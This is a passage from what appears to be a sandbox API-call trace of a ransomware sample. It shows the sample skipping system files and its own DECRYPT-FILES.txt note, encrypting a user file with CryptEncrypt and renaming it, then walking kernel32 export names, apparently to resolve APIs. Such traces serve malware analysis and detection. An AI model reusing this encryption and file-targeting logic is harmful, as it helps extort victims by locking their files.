out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.mydocs", cAlternateFileName="DOCUME~1.MYD")) returned 1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="DECRYPT-FILES.txt") returned 1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="autorun.inf") returned 1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="boot.ini") returned 1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="desktop.ini") returned 1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="ntuser.dat") returned -1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="iconcache.db") returned -1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="bootsect.bak") returned 1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="ntuser.dat.log") returned -1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="thumbs.db") returned -1 [0182.367] lstrcmpiW (lpString1="Documents.mydocs", lpString2="Bootfont.bin") returned 1 [0182.367] lstrlenW (lpString="Documents.mydocs") returned 16 [0182.367] lstrcmpiW (lpString1="mydocs", lpString2="lnk") returned 1 [0182.367] lstrcmpiW (lpString1="mydocs", lpString2="exe") returned 1 [0182.367] lstrcmpiW (lpString1="mydocs", lpString2="sys") returned -1 [0182.367] lstrcmpiW (lpString1="mydocs", lpString2="dll") returned 1 [0182.367] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0182.367] lstrlenW (lpString="Documents.mydocs") returned 16 [0182.367] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0182.367] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Documents.mydocs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" [0182.368] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.368] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\documents.mydocs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.368] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=0) returned 1 [0182.368] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0182.368] CloseHandle (hObject=0x0) returned 0 [0182.368] CloseHandle (hObject=0x27c) returned 1 [0182.368] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.368] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d802e42, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fax Recipient.lnk", cAlternateFileName="FAXREC~1.LNK")) returned 1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="autorun.inf") returned 1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="boot.ini") returned 1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="desktop.ini") returned 1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ntuser.dat") returned -1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="iconcache.db") returned -1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="bootsect.bak") returned 1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ntuser.dat.log") returned -1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="thumbs.db") returned -1 [0182.369] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="Bootfont.bin") returned 1 [0182.369] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0182.369] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.369] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xac1cd7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail.aE7cI9T", cAlternateFileName="MAILRE~1.AE7")) returned 1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="DECRYPT-FILES.txt") returned 1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="autorun.inf") returned 1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="boot.ini") returned 1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="desktop.ini") returned 1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="ntuser.dat") returned -1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="iconcache.db") returned 1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="bootsect.bak") returned 1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="ntuser.dat.log") returned -1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="thumbs.db") returned -1 [0182.369] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.aE7cI9T", lpString2="Bootfont.bin") returned 1 [0182.369] lstrlenW (lpString="Mail Recipient.MAPIMail.aE7cI9T") returned 31 [0182.369] lstrcmpiW (lpString1="aE7cI9T", lpString2="lnk") returned -1 [0182.369] lstrcmpiW (lpString1="aE7cI9T", lpString2="exe") returned -1 [0182.369] lstrcmpiW (lpString1="aE7cI9T", lpString2="sys") returned -1 [0182.369] lstrcmpiW (lpString1="aE7cI9T", lpString2="dll") returned -1 [0182.369] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0182.369] lstrlenW (lpString="Mail Recipient.MAPIMail.aE7cI9T") returned 31 [0182.369] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0182.369] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Mail Recipient.MAPIMail.aE7cI9T" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T" [0182.369] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.aE7cI9T" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.ae7ci9t"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.370] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=268) returned 1 [0182.370] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.370] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.370] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0182.370] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0182.370] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.371] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0182.371] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0182.371] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.372] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.372] CloseHandle (hObject=0x280) returned 1 [0182.372] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.372] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0182.377] CloseHandle (hObject=0x0) returned 0 [0182.377] CloseHandle (hObject=0x27c) returned 1 [0182.377] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.377] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.377] GetTickCount () returned 0x1134fb6 [0182.377] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.378] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0182.378] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0182.378] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.378] lstrlenA (lpString="kernel32.dll") returned 12 [0182.378] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0182.378] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0182.378] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0182.378] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0182.378] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0182.378] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0182.378] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0182.378] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0182.379] lstrlenA (lpString="ADDATOMA") returned 8 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0182.379] lstrlenA (lpString="ADDATOMW") returned 8 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0182.379] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0182.379] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0182.379] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0182.379] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0182.379] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0182.379] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0182.379] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0182.379] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0182.379] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0182.379] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0182.379] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0182.379] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0182.379] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0182.379] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0182.379] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0182.379] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0182.379] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0182.380] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0182.380] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0182.380] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0182.380] lstrlenA (lpString="BACKUPREAD") returned 10 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0182.380] lstrlenA (lpString="BACKUPSEEK") returned 10 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0182.380] lstrlenA (lpString="BACKUPWRITE") returned 11 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0182.380] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0182.380] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0182.380] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0182.380] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0182.380] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0182.380] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0182.380] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0182.380] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0182.380] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0182.380] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0182.380] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0182.380] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0182.381] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0182.381] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0182.381] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0182.381] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0182.381] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0182.381] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0182.381] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0182.381] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0182.381] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0182.381] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0182.381] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0182.381] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0182.381] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0182.381] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0182.381] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0182.381] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0182.381] lstrlenA (lpString="BEEP") returned 4 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0182.381] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0182.381] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0182.382] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0182.382] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0182.382] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0182.382] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0182.382] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0182.382] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0182.382] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0182.382] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0182.382] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0182.382] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0182.382] lstrlenA (lpString="CANCELIO") returned 8 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") 